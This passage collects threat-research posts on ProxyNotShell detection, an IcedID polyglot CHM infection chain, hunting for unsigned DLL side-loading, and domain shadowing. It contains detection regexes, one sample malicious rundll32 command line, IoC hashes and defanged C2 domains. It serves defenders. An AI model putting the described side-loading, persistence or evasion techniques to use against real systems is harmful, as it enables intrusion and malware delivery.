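    """Recursively scan *.log files under log_dir and yield (path, line) hits."""
    for path in Path(log_dir).rglob("*.log"):
        with path.open("r", encoding="utf-8", errors="replace") as handle:
            for hit in find_suspicious_lines(handle):
                yield str(path), hit
```

A match is only a lead for investigation: the pattern can miss variants of the request and can flag unrelated lines that happen to contain the same tokens.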

Cortex XDR customers can search for signs of exploitation by employing the queries included in the following section of this brief. The queries include evidence of certutil connections to public IPs, evidence of DLL and EXE writes to C:\Users\Public\, evidence of China Chopper webshell activity, and the addition of suspicious files to Exchange directories.

Unit 42 Managed Threat Hunting Queries

The Unit 42 Managed Threat Hunting team continues to track any attempts to exploit these CVEs across our customers, using Cortex XDR and the XQL queries below. Cortex XDR customers can also use these XQL queries to search for signs of exploitation.

Conclusion

Based on the amount of publicly available information, the ease of use and the extreme effectiveness of this exploit, Palo Alto Networks highly recommends following Microsoft’s guidance to protect your organization until a patch is issued to fix the problem. Palo Alto Networks and Unit 42 will continue to monitor the situation for updated information, release of proof-of-concept code and evidence of more widespread exploitation.

Palo Alto Networks customers can leverage a variety of product protections and updates to identify and defend against this threat.

Next-Generation Firewalls (PA-Series, VM-Series and CN-Series) or Prisma Access with an Advanced Threat Prevention security subscription can automatically block sessions related to CVE-2022-41040 using Threat ID 91368 (Application and Threat content update 8624).

Cortex XSOAR has released a response pack and playbook for the ProxyNotShell CVEs to help automate and speed the mitigation process.

This playbook automates the following tasks:

  • Collection of Microsoft mitigation tools, detection rules and GTSC indicators
  • Extraction of these indicators and tagging to incidents
  • Hunting for exploitation patterns using Cortex XDR-XQL queries
  • Hunting for exploitation patterns using the following SIEM products:
    • Azure Sentinel
    • Splunk
    • QRadar
    • Elasticsearch
  • Indicator hunting using PAN-OS, Splunk and QRadar
  • Mitigation actions such as deploying detection rules and recommended workarounds

Figure 1. Portion of the ProxyNotShell Cortex XSOAR playbook illustrating collection and extraction of indicators and rules.
Figure 2. Portion of the ProxyNotShell Cortex XSOAR playbook illustrating SIEM threat hunting.
Figure 3. Portion of the ProxyNotShell Cortex XSOAR playbook illustrating Cortex XDR-XQL threat hunting.

See the Cortex XSOAR page on CVE-2022-41040 & CVE-2022-41082 - ProxyNotShell for details on the pack. To find out about other Cortex XSOAR packs and playbooks, visit our Cortex XSOAR Developer Docs reference page.

Cortex Xpanse has the ability to identify and detect Microsoft Exchange servers that may be a part of your attack surface or the attack surface of third-party partners connected to your organization.

Cortex XDR agents running version 7.7 or later with content version 710-19877 or later report attempts to use the exploitation chain that we have identified.

To ensure you are receiving alerts and monitoring any exploitation attempts:

  • Verify that you are using Cortex XDR agent version 7.7 (or newer)
  • Verify that your agent is on content update 710-19877 (or newer)
  • Perform an agent heartbeat
  • Restart Microsoft Internet Information Services (IIS) using the command: “iisreset”

A new Behavioral Threat Protection (BTP) rule has been added to notify XDR customers about exploitation attempts:

The alert can be displayed in two forms, depending on whether you enabled ‘Informative BTP Alerts’ in the agent configuration:

| Configuration | Alert name | Alert description |
| --- | --- | --- |
| Informative BTP Alerts enabled | Webserver Exploitation - 286099623 | Exchange ProxyNotShell CVE-2022-41040 variant - Behavioral threat detected (rule: bioc.sync.exchange_proxynotshell_cve_2022_41040) |
| Informative BTP Alerts disabled | Behavioral Threat Detected | Behavioral threat detected (rule: bioc.sync.exchange_proxynotshell_cve_2022_41040) |

As part of the Cortex XDR multi-layer protection approach, existing Behavioral Threat Protection rules can already detect and prevent the dropping of malicious webshells from a Microsoft Exchange server. Those rules provide protection until the rule above goes into block mode in the near future.

The malicious URLs and IPs have been released to Advanced URL Filtering and Built-in External Dynamic Lists, respectively.

Prisma Cloud Web-Application and API Security (WAAS) customers receive protections from this threat through the ProxyShell custom rule.

If you think you may have been compromised or have an urgent matter, you can get in touch with the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

As further information emerges or additional detections and protections are put into place, Palo Alto Networks will update this publication accordingly.

Updated Oct. 11, 2022, at 1:30 p.m. PT.

More Than Meets the Eye: Exposing a Polyglot File That Delivers IcedID

Executive Summary

Unit 42 recently observed a polyglot Microsoft Compiled HTML Help (CHM) file being employed in the infection process used by the information stealer IcedID. We will show how to analyze the polyglot CHM file and the final payload so you can understand how the sample evades detection.

Multiple attack groups such as Starchy Taurus (aka APT41) and Evasive Serpens (formerly tracked as OilRig, also known as Europium) have abused CHM files to conceal payloads written using PowerShell or JavaScript. Here, we describe an interesting attack that allows attackers to avoid the need for long lines of code, which can make it easier for malicious files to evade detection by security products. Polyglot files can be abused by attackers to hide from anti-malware systems that rely on file format identification. The technique involves executing the same CHM file twice in the infection process. The first execution exhibits benign activities, while the second execution stealthily carries out malicious behaviors.

This particular attack chain was discovered in early August 2022 and delivered IcedID, also known as Bokbot, as the final payload. This information stealer, IcedID, is well-known malware that has been attacking users since 2019.

Palo Alto Networks customers receive protections from malware families using similar anti-analysis techniques with Cortex XDR or the Next-Generation Firewall with cloud-delivered security services including WildFire, Advanced Threat Prevention, Advanced URL Filtering and DNS Security.

Related Unit 42 Topics Malware, IcedID, Evasion

Malicious Polyglot CHM File

Polyglot files are binaries that are valid in more than one file format. Such a file behaves differently depending on the application used to open or execute it.
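
As a rough illustration of why identifying a file by a single format is fragile, the Python sketch below checks one buffer for markers of two formats at once. The `ITSF` header is the standard signature at the start of a CHM file. The HTA and script markers, and the function names, are assumptions chosen for illustration. Real format identification is more involved, and this heuristic can produce false positives.

```python
from typing import List

CHM_MAGIC = b"ITSF"  # signature at the start of a Compiled HTML Help file
# Illustrative markers only: plain-text HTML application or script tags.
HTA_MARKERS = (b"<hta:application", b"<script")


def detect_formats(data: bytes) -> List[str]:
    """Return the names of every format whose marker appears in data."""
    found = []
    if data.startswith(CHM_MAGIC):
        found.append("chm")
    lowered = data.lower()
    if any(marker in lowered for marker in HTA_MARKERS):
        found.append("html-application")
    return found


def is_polyglot(data: bytes) -> bool:
    """True when more than one format marker is present in the same buffer."""
    return len(detect_formats(data)) > 1
```

A scanner that stops at the first matching signature would label such a buffer as a help file only, which is the gap a polyglot is built to exploit.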

The attack that was discovered in early August 2022 starts with a phishing email that includes an attached zip file named erosstrucking-file-08.08.2022.zip. The zip file decompresses into an ISO image file named order-130722.28554.iso. Inside the ISO file is a CHM file called pss10r.chm (SHA256: 3d279aa8f56e468a014a916362540975958b9e9172d658eb57065a8a230632fa). CHM files are normally used to display help documentation, so when the user launches the polyglot CHM file (pss10r.chm), a harmless-looking help window is displayed.

Decoy HTML help window appears to contain a message from Microsoft Customer Service and Support as shown.
Figure 1. Decoy HTML help window.

To dump the contents of the CHM file, we used 7zip. The file of interest is PSSXMicrosoftSupportServices_HP05221271.htm.

Contents of the decoy HTML help window include PSSXMicrosoftSupportServices_HP05221271.htm, the file of interest.
Figure 2. Contents of the decoy HTML help window.

Most of the code in the HTML file is used for generating the decoy window. However, concealed within the HTML code is a single-line command to execute the same CHM file again. The command calls Mshta.exe to execute itself (pss10r.chm) a second time. Mshta.exe is a utility that executes Microsoft HTML Application (HTA) files. HTAs are full-fledged applications created using HTML.

The line shown calls mshta to execute pss10r.chm a second time.
Figure 3. A line of HTML code in PSSXMicrosoftSupportServices_HP05221271.htm that calls Mshta.exe to execute the CHM file a second time.
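
Because Mshta.exe is meant to run HTA files, a command line in which it receives a .chm file is unusual and worth flagging. The following Python sketch shows one way to test process command lines for that combination. The regular expression and function name are hypothetical, and the check is a heuristic, not a rule taken from any product.

```python
import re

# Hypothetical heuristic: mshta (with or without ".exe") followed, within the
# same command (no pipe or ampersand in between), by an argument ending in ".chm".
MSHTA_CHM = re.compile(r"\bmshta(?:\.exe)?\b[^|&]*\.chm\b", re.IGNORECASE)


def is_mshta_running_chm(command_line: str) -> bool:
    """Return True if the command line shows mshta being given a CHM file."""
    return MSHTA_CHM.search(command_line) is not None
```

In practice this would be applied to process-creation telemetry, with the parent process (for example hh.exe, the HTML Help viewer) used as additional context.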

The code of the HTA is buried within the binary of the CHM file and configured to be invisible to the victim during execution. The HTA is used to execute the binary app.dll. 

A screenshot showing the HTA code buried in pss10r.chm. This is used to execute the binary app.dll
Figure 4. HTA code buried in pss10r.chm.

The binary app.dll is actually hidden within the ISO image. The hidden binary can be revealed using the attrib command.

The screenshot shows how the attrib command reveals the hidden binary
Figure 5. Revealing the hidden binary.
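
The same check can be scripted. The Python sketch below lists files whose Windows hidden attribute is set, using the `st_file_attributes` field that `os.stat` exposes on Windows and the `stat.FILE_ATTRIBUTE_HIDDEN` constant. The function names are hypothetical, and on non-Windows systems the attribute field is absent, so the walk simply returns nothing.

```python
import os
import stat
from typing import Iterator


def has_hidden_flag(attributes: int) -> bool:
    """True if the Windows file-attribute bitmask includes the hidden flag."""
    return bool(attributes & stat.FILE_ATTRIBUTE_HIDDEN)


def iter_hidden_files(root: str) -> Iterator[str]:
    """Yield paths under root (for example a mounted ISO) that are hidden."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            # st_file_attributes exists only on Windows; default to 0 elsewhere.
            attrs = getattr(os.stat(path), "st_file_attributes", 0)
            if has_hidden_flag(attrs):
                yield path
```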

The app.dll binary is a 64-bit IcedID DLL. (SHA256: d240bd25a0516bf1a6f6b3f080b8d649ed2b116c145dd919f65c05d20fc73131)

IcedID DLL’s Configuration Extraction

To retrieve the indicators of compromise (IoCs) from the IcedID DLL, we looked at its configuration. The IcedID DLL’s configuration is encoded and stored in the data section of the binary. The encoded configuration has the format shown in Figure 6.

Encoded configuration of the IcedID DLL.
Figure 6. Structure of encoded configuration blob.

The function shown in Figure 7 decodes the IcedID DLL’s configuration at runtime. The function contains the address of the encoded configuration (enc_config).

Figure 7. IcedID DLL’s configuration decoder function.

The decoded IcedID DLL’s configuration has the format shown in Figure 8.

Figure 8. Structure of decoded IcedID configuration.

From the decoded configuration, we can extract the following IoCs:

Command and Control URL: abegelkunic[.]com
Campaign ID: 4157420015

Conclusion

Threat actors continue to evolve their techniques to evade detection. The above analysis demonstrates how attackers abused a polyglot Microsoft Compiled HTML Help (CHM) file to deliver an IcedID payload. Defenders should not trust binaries based on their file types alone, since polyglot files such as the one discussed here have more than one valid file type.

Palo Alto Networks customers receive protections from malware families using similar anti-analysis techniques with Cortex XDR or the Next-Generation Firewall with cloud-delivered security services including WildFire, Advanced Threat Prevention, Advanced URL Filtering and DNS Security.

Indicators of Compromise

File name: erosstrucking-file-08.08.2022.zip
SHA256: fb6d23f69d14d474ce096da4dcfea27a84c93f42c96f6dd8295d33ef2845b6c7

File name: order-130722.28554.iso
SHA256: d403df3fb181560d6ebf4885b538c5af86e718fecfabc73219b64924d74dd0eb

File name: pss10r.chm
SHA256: 3d279aa8f56e468a014a916362540975958b9e9172d658eb57065a8a230632fa

File name: app.dll
SHA256: d240bd25a0516bf1a6f6b3f080b8d649ed2b116c145dd919f65c05d20fc73131

Command and Control URL: abegelkunic[.]com

Additional Resources

Harmful Help: Analyzing a Malicious Compiled HTML Help File Delivering Agent Tesla

Hunting for Unsigned DLLs to Find APTs

Executive Summary

Malware authors regularly evolve their techniques to evade detection and execute more sophisticated attacks. We’ve commonly observed one method over the past few years: unsigned DLL loading.

Assuming that this method might be used by advanced persistent threats (APTs), we hunted for it. The hunt revealed sophisticated payloads and APT groups in the wild, including the Chinese cyberespionage group Stately Taurus (formerly known as PKPLUG, aka Mustang Panda) and the North Korean Selective Pisces (aka Lazarus Group).

Below, we show how hunting for the loading of unsigned DLLs can help you identify attacks and threat actors in your environment.

Palo Alto Networks customers receive protections and detections against malicious DLL loading through the Cortex XDR agent.

Threat Actor Groups Discussed
| Unit 42 tracks group as… | Group also known as… |
| --- | --- |
| Stately Taurus | Mustang Panda, PKPLUG, BRONZE PRESIDENT, HoneyMyte, Red Lich, Baijiu |
| Selective Pisces | Lazarus Group, ZINC, APT-C-26 |

Malicious DLLs: A Common Method Attackers Use for Executing Malicious Payloads on Infected Systems

Based on our observations over years of proactive threat-hunting experience, we hypothesize that one of the main methods for executing malicious payloads on infected systems is loading a malicious DLL. As both individual hackers and APT groups use this method, we decided to conduct research based on this hypothesis.

Most of the malicious DLLs we observe in the wild share three common characteristics:

  • The DLLs are mostly written to unprivileged paths.
  • The DLLs are unsigned.
  • To evade detection, the DLLs are loaded by a signed process, whether a utility dedicated to loading DLLs (such as rundll32.exe) or an executable that loads DLLs as part of its activity.

With that in mind, we found that threat actors in the wild most commonly use the following techniques:

  1. DLL loading by rundll32.exe/regsvr32.exe – While those processes are signed and known binaries, threat actors abuse them to achieve code execution in an attempt to evade detection.
  2. DLL search order hijacking – This refers to loading a malicious DLL by abusing the DLL search order of a legitimate process. This way, a benign application will load a malicious payload that carries the name of a known DLL.

Reviewing the results of the above techniques in the wild revealed that the most common unprivileged paths to load malicious unsigned DLLs are the folders and sub-folders of ProgramData, AppData and the users’ home directories.

The next section will introduce several findings based on the above hypothesis.

Attack Trends in the Wild Related to Unsigned DLLs

To start hunting based on the hypothesis we described, we created two XQL queries. The first one looks for unsigned DLLs that were loaded by rundll32.exe/regsvr32.exe, while the other looks for signed software that loads an unsigned DLL.
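
The logic of those two hunts can be sketched outside of XQL. The Python example below is not the XQL used in our hunt. It is a minimal illustration over a hypothetical `ModuleLoad` record whose field names are assumptions. The first filter keeps unsigned DLLs loaded by rundll32.exe or regsvr32.exe, and the second keeps unsigned DLLs loaded by any other signed process. Excluding the two loaders from the second filter is a design choice of this sketch so the result sets do not overlap.

```python
import ntpath
from dataclasses import dataclass
from typing import Iterable, List

LOLBIN_LOADERS = {"rundll32.exe", "regsvr32.exe"}
# Path fragments for the unprivileged locations named in this post.
UNPRIVILEGED_MARKERS = ("\\programdata\\", "\\appdata\\", "\\users\\")


@dataclass
class ModuleLoad:
    """Hypothetical module-load event; field names are illustrative."""
    loader_path: str
    loader_signed: bool
    module_path: str
    module_signed: bool


def loader_name(event: ModuleLoad) -> str:
    """Lower-cased file name of the loading process (Windows path rules)."""
    return ntpath.basename(event.loader_path).lower()


def in_unprivileged_path(path: str) -> bool:
    """True if the path sits under ProgramData, AppData or a user directory."""
    lowered = path.lower()
    return any(marker in lowered for marker in UNPRIVILEGED_MARKERS)


def unsigned_loads_by_lolbin(events: Iterable[ModuleLoad]) -> List[ModuleLoad]:
    """Unsigned DLLs loaded by rundll32.exe or regsvr32.exe."""
    return [e for e in events
            if not e.module_signed and loader_name(e) in LOLBIN_LOADERS]


def unsigned_loads_by_signed_process(events: Iterable[ModuleLoad]) -> List[ModuleLoad]:
    """Unsigned DLLs loaded by other signed software (side-loading candidates)."""
    return [e for e in events
            if e.loader_signed and not e.module_signed
            and loader_name(e) not in LOLBIN_LOADERS]
```

Either result set can then be narrowed with `in_unprivileged_path(event.module_path)` to focus on the locations where malicious DLLs are most often written.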

The hunting activity revealed various malware families that used unsigned DLL loading. Figure 1 presents the malware we detected using these methods over the past six months (February-August 2022).

Malware observed using DLL loading between February-August 2022: Raspberry Robin (31.0%), Emotet (17.4%), QakBot (15.5%), IcedID (9.7%), Cobalt Strike (7.8%), Vawtrak (6.8%), Ursnif (5.8%), Amavaldo (3.1%), Stately Taurus (1.9%), Selective Pisces (1.0%)
Figure 1. Malware observed using DLL loading.

Analyzing the execution techniques used by the above threats showed that banking trojans and individual threat actors typically used rundll32.exe or regsvr32.exe to load a malicious DLL, while APT groups used the DLL side-loading technique most of the time.

Diving Into Selected Payloads

Stately Taurus

We decided to highlight an investigation around Stately Taurus activity that we detected in the environment of one organization. Stately Taurus is a Chinese APT group that usually targets non-governmental organizations and is known for abusing legitimate software to load payloads.

In this case, we observed the usage of the DLL search order hijacking technique that enabled the attacker’s malicious DLL to load into the memory space of a legitimate process. The threat actor used multiple pieces of third-party software for the DLL side-loading, such as antivirus software and a PDF reader.

The screenshot shows the benign exe file (AvastSvc.exe) that uses side-loading to load the malicious DLL wsc.dll
Figure 2. AvastSvc.exe uses side-loading to load a malicious DLL.

To achieve DLL side-loading, the group dropped the payload into the ProgramData folder, which contained three files – a benign EXE file for DLL hijacking (AvastSvc.exe), a DLL file (wsc.dll) and an encrypted payload (AvastAuth.dat). The loaded DLL appeared to be the PlugX RAT, which loads the encrypted payload from the .dat file.

The table shows the following: File Create - AvastAuth.dat - C:\ProgramData\AvastSvcZEg\AvastAuth.dat; File Write - wsc.dll - C:\ProgramData\AvastSvcZEg\wsc.dll; File Write - wsc.dll - C:\ProgramData\AvastSvcZEg\wsc.dll; File Create - wsc.dll - C:\ProgramData\AvastSvcZEg\wsc.dll; File Write - AvastSvc.exe - C:\ProgramData\AvastSvcZEg\AvastSvc.exe
Figure 3. PlugX files: benign executable, DLL loader and encrypted .dat file.

Selective Pisces

Among the results of our hunting queries, we also identified several high-entropy malicious modules within the ProgramData directories shown in Figure 4.

The screenshot shows high-entropy malicious modules associated with Selective Pisces, including uso.dat (0.999545), mi.dll (0.999396), mi.dll (0.999393), SXSHARED.DLL (0.999354), and USOShared.tmp (0.999317)
Figure 4. DLL side-loading by Selective Pisces.
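
The entropy values in this post fall between 0 and 1, which suggests a normalized score. How Cortex XDR computes it is not specified here. The Python sketch below therefore makes an assumption and uses Shannon entropy over byte frequencies, divided by 8 (the maximum number of bits per byte). Encrypted or compressed data scores close to 1.0 on this scale, while repetitive data scores close to 0.

```python
import math
from collections import Counter


def normalized_entropy(data: bytes) -> float:
    """Shannon entropy of the byte distribution, scaled to the range 0..1."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    bits = -sum((c / total) * math.log2(c / total) for c in counts.values())
    return bits / 8.0  # 8 bits is the maximum entropy of a single byte
```

Applied to a file's contents, for example `normalized_entropy(open(path, "rb").read())`, a result near 1.0 indicates that the module is probably packed or encrypted, which is a reason to look closer but not proof of malice.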

Investigating the execution chain of the unsigned modules shown in Figure 4 revealed that they were dropped to the disk by the signed DreamSecurity MagicLine4NX process (MagicLine4NX.exe).

MagicLine4NX.exe executed a second-stage payload that we observed utilizing DLL side-loading in order to evade detection. The second-stage payload wrote a new DLL named mi.dll, and copied wsmprovhost.exe (host process for WinRM) to a random directory in ProgramData. Wsmprovhost.exe is a native Windows binary that attempts to load mi.dll from the same directory. The attackers abused this mechanism in order to achieve DLL side-loading (T1574.002) with this process.

The mi.dll payload was observed dropping a new payload named ualapi.dll to the System32 directory (C:\Windows\System32\ualapi.dll). Because ualapi.dll is, in this case, missing from the System32 directory, the attackers achieved persistence by giving their malicious payload that name, so that spoolsv.exe loads it upon startup.

After analyzing the payloads above, we attributed them to the North Korean APT group that Unit 42 tracks as Selective Pisces. This group’s utilization of legitimate third-party software such as MagicLine4NX was described earlier this year in a blog post by Symantec.

Raspberry Robin

The last attack we would like to elaborate on is the most common one we observed in the wild. Some of the results that our queries yield share several common characteristics:

  • DLLs with scrambled names reside in random sub-folders of the ProgramData or AppData folders.
  • Those DLLs have a similar range of entropy (~0.66).
  • All of them were loaded by rundll32.exe or regsvr32.exe.

For example: RUNDLL32.EXE C:\ProgramData\<random_folder>\fhcplow_Tudjdm.dll,iarws_sbv
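
To triage command lines of this shape in bulk, it helps to split them into the DLL path and the exported function being called. The Python sketch below is a minimal parser written under simplifying assumptions: the export is everything after the last comma, and any extra arguments after it are not handled. The names `RundllCall` and `parse_rundll32` are hypothetical.

```python
import re
from typing import NamedTuple, Optional


class RundllCall(NamedTuple):
    dll_path: str
    export: str


# Optional quoted or unquoted directory prefix, then rundll32[.exe], then the rest.
RUNDLL = re.compile(
    r'^\s*"?(?:[^"\s]*\\)?rundll32(?:\.exe)?"?\s+(?P<rest>.+)$',
    re.IGNORECASE,
)


def parse_rundll32(command_line: str) -> Optional[RundllCall]:
    """Split 'rundll32 <dll>,<export>' into its parts, or return None."""
    match = RUNDLL.match(command_line)
    if not match:
        return None
    dll_path, sep, export = match.group("rest").rpartition(",")
    if not sep:  # no comma, so no export name was given
        return None
    return RundllCall(dll_path.strip().strip('"'), export.strip())
```

The extracted path can then be checked against the characteristics listed above, such as a location under ProgramData or AppData and a scrambled file name.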

DLLs loaded by Raspberry Robin include npwmse_Nemcttdid.dll, iyclBaiic_fig.dll, Portsoft_Gdfv.dll, adlsoft_w_ni.dll, dfjssoft_002.dll, fhcplow_Tudjdm.dll, CNBERngs_De4_3.dll
Figure 5. DLLs loaded by Raspberry Robin.

The DLL loading activities that take place in those attacks were attributed to a campaign called Raspberry Robin, which was recently described by Red Canary.

Those attacks begin with a shortcut file on an infected USB device. The shortcut spawns msiexec.exe to retrieve the malicious DLL from a remote C2 server. During installation, a scheduled task is created to achieve persistence by loading the DLL with rundll32.exe/regsvr32.exe on system startup.

Using Unsigned DLLs to Hunt for Attacks in Your Environment

You can hunt for the loading of unsigned DLLs using XQL Search in Cortex XDR. To narrow down the results, we suggest focusing on the following:

  • For DLL side-loading, we recommend paying attention to known third-party software placed in non-standard directories.
  • Focus on the file’s entropy – binaries that have a high value of entropy may contain a packed section that will be extracted during execution.
  • Focus on the frequency of execution – high-frequency results may indicate a legitimate activity that occurs periodically, while low-frequency results may be a lead for an investigation.
  • Focus on the file’s path – results that contain folders or files with scrambled names are more suspicious than others.
Query results sorted by the module's entropy, showing how examples of Emotet execution rise when sorted in that way. Module entropy scores range from 0.860774 to 0.637715 in the examples shown here.
Figure 6. Query results sorted by the module’s entropy.

Figure 6 contains partial results of the queries that are mentioned in the next section, sorted by the module’s entropy. While the first two rows are an example of Emotet execution, the others are benign DLLs.
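
Sorting by entropy is one way to rank results, and frequency of execution is another. The Python sketch below counts how often each loader and module pair appears and returns only the rare pairs, rarest first. The input shape (tuples of loader and module path) and the `max_count` threshold are assumptions for illustration.

```python
from collections import Counter
from typing import Iterable, List, Tuple

Pair = Tuple[str, str]


def rare_loads(events: Iterable[Pair], max_count: int = 2) -> List[Tuple[Pair, int]]:
    """Return (loader, module) pairs seen at most max_count times, rarest first."""
    counts = Counter((loader.lower(), module.lower()) for loader, module in events)
    rare = [(pair, n) for pair, n in counts.items() if n <= max_count]
    return sorted(rare, key=lambda item: (item[1], item[0]))
```

Pairs that occur many times across an environment are more likely to be periodic, legitimate activity, so the short list this returns is a reasonable place to start an investigation.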

Hunting Queries

Conclusion

Most detection techniques for blocking malicious DLLs rely on the module's behavior after it has been loaded into memory. This can limit the ability to block all malicious modules.

That said, you can proactively hunt for malicious unsigned DLLs using hunting approaches such as the ones presented in this blog.

Knowing the baseline of your network in terms of legitimate software or behavior can reduce the number of results generated by the above queries, allowing you to focus on results that might be suspicious.

Cortex XDR alerts on and blocks malicious DLLs loaded by known hijacking techniques, and can also prevent post-exploitation activities, through the Behavioral Threat Protection and Analytics modules.

Indicators of compromise and TTPs associated with Stately Taurus can be found in the Stately Taurus ATOM.

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call North America Toll-Free: 866.486.4842 (866.4.UNIT42), EMEA: +31.20.299.3130, APAC: +65.6983.8730, or Japan: +81.50.1790.0200.

Indicators of Compromise

Threat Actor SHA256
Selective Pisces 779a6772d4d35e1b0018a03b75cc6f992d79511321def35956f485debedf1493
Selective Pisces d9b1ad70c0a043d034f8eecd55a8290160227ea66780ccc65d0ffb2ebc2fb787
Selective Pisces 3131985fa7394fa9dbd9c9b26e15ac478a438a57617f1567dc32c35b388c2f60
Selective Pisces 5be717dc9eda4df099e090f2a59c25372d6775e7d6551b21f385cf372247c2fd
Selective Pisces 18cc18d02742da3fa88fc8c45fe915d58abb52d3183b270c0f84ae5ff68cf8a2
Selective Pisces 7aa62af5a55022fd89b3f0c025ea508128a03aab5bc7f92787b30a3e9bc5c6e4
Selective Pisces 79b7964bde948b70a7c3869d34fe5d5205e6259d77d9ac7451727d68a751aa7d
Selective Pisces cf9ccba037f807c5be523528ed25cee7fbe4733ec19189e393d17f92e76ffccc
Selective Pisces 32449fd81cc4f85213ed791478ec941075ff95bb544ba64fa08550dd8af77b69
Selective Pisces 5a8b1f003ae566a8e443623a18c1f1027ec46463c5c5b413c48d91ca1181dbf7
Selective Pisces 5bb4950a05a46f7d377a3a8483484222a8ff59eafdf34460c4b1186984354cf9
Stately Taurus 352fb4985fdd150d251ff9e20ca14023eab4f2888e481cbd8370c4ed40cfbb9a
Stately Taurus 6491c646397025bf02709f1bd3025f1622abdc89b550ac38ce6fac938353b954
Stately Taurus e8f55d0f327fd1d5f26428b890ef7fe878e135d494acda24ef01c695a2e9136d
Raspberry Robin 06f11ea2d7d566e33ed414993da00ac205793af6851a2d6f809ff845a2b39f57
Raspberry Robin 202dab603585f600dbd884cb5bd5bf010d66cab9133b323c50b050cc1d6a1795
Raspberry Robin f9e4627733e034cfc1c589afd2f6558a158a349290c9ea772d338c38d5a02f0e
Raspberry Robin 9fad2f59737721c26fc2a125e18dd67b92493a1220a8bbda91e073c0441437a9
Raspberry Robin 9973045c0489a0382db84aef6356414ef29814334ecbf6639f55c3bec4f8738f

Table 1. Hashes of samples.

Domain Shadowing: A Stealthy Use of DNS Compromise for Cybercrime

Executive Summary

Cybercriminals compromise domain names to attack the owners or users of the domains directly, or use them for various nefarious endeavors, including phishing, malware distribution, and command and control (C2) operations. A special case of DNS hijacking is called domain shadowing, where attackers stealthily create malicious subdomains under compromised domain names. Shadowed domains do not affect the normal operation of the compromised domains, making it hard for victims to detect them. The inconspicuousness of these subdomains often allows perpetrators to take advantage of the compromised domain’s benign reputation for a long time.

Current threat research-based detection approaches are labor-intensive and slow as they rely on the discovery of malicious campaigns that use shadowed domains before they can look for related domains in various data sets. To address these issues, we designed and implemented an automated pipeline that can detect shadowed domains faster on a large scale for campaigns that are not yet known. Our system processes terabytes of passive DNS logs every day to extract features about candidate shadowed domains. Building on these features, it uses a high-precision machine learning model to identify shadowed domain names. Our model finds hundreds of shadowed domains created daily under dozens of compromised domain names.

Emphasizing the difficulty of discovering shadowed domains, we found that only 200 domains were marked as malicious by vendors on VirusTotal out of 12,197 shadowed domains automatically detected by us between April 25 and June 27, 2022. As an example, we give a detailed account of a phishing campaign leveraging 649 shadowed subdomains under 16 compromised domains such as bancobpmmavfhxcc.barwonbluff.com[.]au and carriernhoousvz.brisbanegateway[.]com. The perpetrators leveraged the benign reputation of these domains to spread fake login pages harvesting credentials. VirusTotal vendor performance is much better for this specific campaign, with 151 of the 649 shadowed domains marked as malicious, but this is still less than one quarter of all the domains.

Palo Alto Networks provides protection against shadowed domains leveraging our automated classifier in multiple Palo Alto Networks Next-Generation Firewall cloud-delivered security services, including DNS Security and Advanced URL Filtering. Additionally, customers can leverage Cortex XDR to alert on and respond to domain shadowing when used for C2 communications.

Related Unit 42 Topics DNS Security, Credential Harvesting

How Domain Shadowing Works

Cybercriminals use domain names for various nefarious purposes, including communication with C2 servers, malware distribution, scams and phishing. To help perpetrate these activities, crooks can either purchase domain names (malicious registration) or compromise existing ones (DNS hijacking/compromise). Avenues for criminals to compromise a domain name include stealing the login credentials of the domain owner at the registrar or DNS service provider, compromising the registrar or DNS service provider, compromising the DNS server itself, or abusing dangling domains.

Domain shadowing is a subcategory of DNS hijacking, where attackers attempt to stay unnoticed. First, cybercriminals stealthily insert subdomains under the compromised domain name. Second, they keep existing records to allow the normal operation of services such as websites, email servers and any other services using the compromised domain. By ensuring the undisturbed operation of existing services, the criminals make the compromise inconspicuous to the domain owners and the cleanup of malicious entries unlikely. As a result, domain shadowing provides attackers access to virtually unlimited subdomains inheriting the compromised domain’s benign reputation.

When attackers change the DNS records of existing domain names, they aim to target the owners or users of these domain names. However, criminals often use shadowed domains as part of their infrastructure to support endeavors such as generic phishing campaigns or botnet operations. In the case of phishing, crooks can use shadowed domains as the initial domain in a phishing email, as an intermediate node in a malicious redirection (e.g., in a malicious traffic distribution system), or as a landing page hosting the phishing website. In the case of botnet operations, a shadowed domain can be used, for example, as a proxy domain to conceal C2 communication.

In Table 1, we collect example shadowed domains used as part of a recent phishing campaign automatically discovered by our detector. The attackers compromised several domain names that have existed for many years and thus built up a good reputation. We can observe that the IP addresses of these domains (and IPs of their benign subdomains) are located in either Australia (AU) or the United States (US). Suspiciously, all the shadowed domains have IP addresses located in Russia (RU) – a different country and autonomous system from the parent domains. Furthermore, all shadowed domains in this campaign use an IP address from the same /24 IP subnet (the first three numbers are the same in the IP address). An additional indicator of malice we noticed is that all the malicious subdomains shown were activated around the same time and were operational for a relatively short period.

| FQDN | IP Address | CC | First Seen | Last Seen | Time Active* |
| --- | --- | --- | --- | --- | --- |
| halont.edu[.]au | 103.152.248[.]148 | AU | 2020-11-23 | 2022-06-28 | ~ 9 years |
| training.halont.edu[.]au | 103.152.248[.]148 | AU | 2020-12-08 | 2021-05-02 | ~ 7 years |
| training.halont.edu[.]au** | 62.204.41[.]218 | RU | 2022-04-17 | 2022-05-06 | < 1 month |
| ocwdvmjjj78krus.halont.edu[.]au | 62.204.41[.]218 | RU | 2022-04-04 | 2022-04-04 | < 1 day |
| baqrxmgfr39mfpp.halont.edu[.]au | 62.204.41[.]218 | RU | 2022-04-01 | 2022-04-01 | < 1 day |
| barwonbluff.com[.]au | 27.131.74[.]5 | AU | 2018-12-13 | 2022-06-28 | ~ 19 years |
| bancobpmmavfhxcc.barwonbluff.com[.]au | 62.204.41[.]247 | RU | 2022-03-07 | 2022-06-06 | ~ 3 months |
| tomsvprfudhd.barwonbluff.com[.]au | 62.204.41[.]77 | RU | 2022-03-07 | 2022-03-07 | < 1 day |
| brisbanegateway[.]com | 101.0.112[.]230 | AU | 2015-04-23 | 2022-06-24 | ~ 12 years |
| carriernhoousvz.brisbanegateway[.]com | 62.204.41[.]218 | RU | 2022-03-07 | 2022-03-08 | ~ 2 days |
| vembanadhouse[.]com | 162.215.253[.]110 | US | 2019-09-04 | 2022-06-28 | ~ 17 years |
